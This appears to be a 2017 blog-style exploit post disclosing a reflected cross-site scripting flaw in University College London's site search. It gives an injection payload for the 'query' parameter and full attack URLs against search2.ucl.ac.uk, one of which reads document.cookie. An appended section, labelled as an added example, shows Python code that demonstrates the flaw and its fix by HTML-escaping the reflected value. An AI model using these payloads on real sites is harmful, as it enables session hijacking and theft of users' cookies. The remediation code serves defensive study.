Saturday, 22 April 2017

On 00:01 by admin
--------------------------
In the name of god
--------------------------

Exploit Title :
-------------------
London's Global University Cross-Site-Scripting Vulnerability


Exploit Author :
---------------------
4TT4CK3R


Date :
----------
2017/Apr/21


HomePage :
------------------
https://www.ucl.ac.uk


Vendor Page :
---------------------
https://www.ucl.ac.uk/maps/index.php


Parameter Name :
--------------------------
query


Description :
------------------
Our script is:

""/>"certi"<script>alert("4TT4CK3R")</script>"/certi"

Now we can insert this script into the query parameter.

We will have:

http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(%224TT4CK3R%22)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go

And you can get cookies:

http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go

So this university has a cross-site scripting vulnerability!
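The fix for this class of bug is output encoding at the point where query is echoed back. The following is an added example, not code from the original post or from the site: it assumes the value is reflected into an <input value="..."> attribute (a constructed stand-in template, since the page's real markup is not shown) and compares verbatim reflection with HTML-encoded output, using the payload from the post as test input.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for the results page; the <input value="..."> sink is
# an assumption, the post does not show the real markup.
TEMPLATE = '<form><input type="text" name="query" value="{q}"/></form>'

# Payload exactly as given in the post.
PAYLOAD = '""/>"certi"<script>alert("4TT4CK3R")</script>"/certi"'


def render_vulnerable(query: str) -> str:
    """Reflect the parameter verbatim: the leading quote ends value="..." and
    "/>" ends the tag, so the remainder is parsed as markup."""
    return TEMPLATE.format(q=query)


def render_encoded(query: str) -> str:
    """Encode & < > " ' so the whole input stays inside the attribute value."""
    return TEMPLATE.format(q=html.escape(query, quote=True))


class _Collector(HTMLParser):
    """Record which elements a parser sees and the value= attributes."""

    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.values += [v for k, v in attrs if k == "value"]


def parse(markup: str):
    """Return (element names, value attributes) as an HTML parser sees them."""
    collector = _Collector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.values


if __name__ == "__main__":
    for name, render in (("verbatim", render_vulnerable), ("encoded", render_encoded)):
        tags, values = parse(render(PAYLOAD))
        print(f"{name:9} elements={tags} value={values}")
```

With encoding, the parser sees only the form and input elements, and the search box still shows the user's original text because the entities decode back to it inside the attribute.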
